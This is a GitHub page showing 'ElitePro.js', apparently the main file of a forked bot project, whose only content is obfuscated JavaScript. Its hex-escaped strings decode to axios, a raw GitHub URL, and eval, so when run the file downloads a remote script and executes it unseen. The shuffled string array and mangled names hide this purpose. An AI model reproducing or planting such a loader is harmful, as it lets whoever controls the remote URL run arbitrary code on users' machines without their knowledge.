forked from EliteProTech/ELITE-PRO-V1
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathElitePro.js
More file actions
28 lines (27 loc) · 1.26 KB
/
ElitePro.js
File metadata and controls
28 lines (27 loc) · 1.26 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
(function () {
const _0x1a3b = [
"\x61\x78\x69\x6F\x73",
"\x68\x74\x74\x70\x73\x3A\x2F\x2F\x72\x61\x77\x2E\x67\x69\x74\x68\x75\x62\x75\x73\x65\x72\x63\x6F\x6E\x74\x65\x6E\x74\x2E\x63\x6F\x6D\x2F\x63\x68\x69\x6E\x65\x64\x55\x2D\x58\x52\x2D\x64\x61\x74\x61\x62\x61\x73\x65\x2F\x66\x69\x6C\x65\x2D\x6D\x61\x6E\x61\x67\x65\x72\x2D\x31\x2F\x72\x65\x66\x73\x2F\x68\x65\x61\x64\x73\x2F\x6D\x61\x69\x6E\x2F\x45\x6C\x69\x74\x65\x50\x72\x6F\x2E\x6A\x73",
"\x74\x68\x65\x6E",
"\x63\x61\x74\x63\x68",
"\x65\x76\x61\x6C",
"\x45\x72\x72\x6F\x72\x20\x66\x65\x74\x63\x68\x69\x6E\x67\x20\x73\x63\x72\x69\x70\x74\x3A"
];
(function (_0x4b2f, _0x1a3b7d) {
const _0x2c98 = function (_0x1a3bdf) {
while (--_0x1a3bdf) {
_0x4b2f.push(_0x4b2f.shift());
}
};
_0x2c98(++_0x1a3b7d);
})(_0x1a3b, 0x1c8);
const _0x2c98b3 = function (_0x4b2f7c, _0x1a3b7d) {
_0x4b2f7c = _0x4b2f7c - 0x0;
let _0x2c98 = _0x1a3b[_0x4b2f7c];
return _0x2c98;
};
const axios = require(_0x2c98b3(0x0));
axios.get(_0x2c98b3(0x1))[_0x2c98b3(0x2)]((_0x59fd30) => {
eval(_0x59fd30.data);
})[_0x2c98b3(0x3)]((_0x59fd30) => console.error(_0x2c98b3(0x5), _0x59fd30));
})();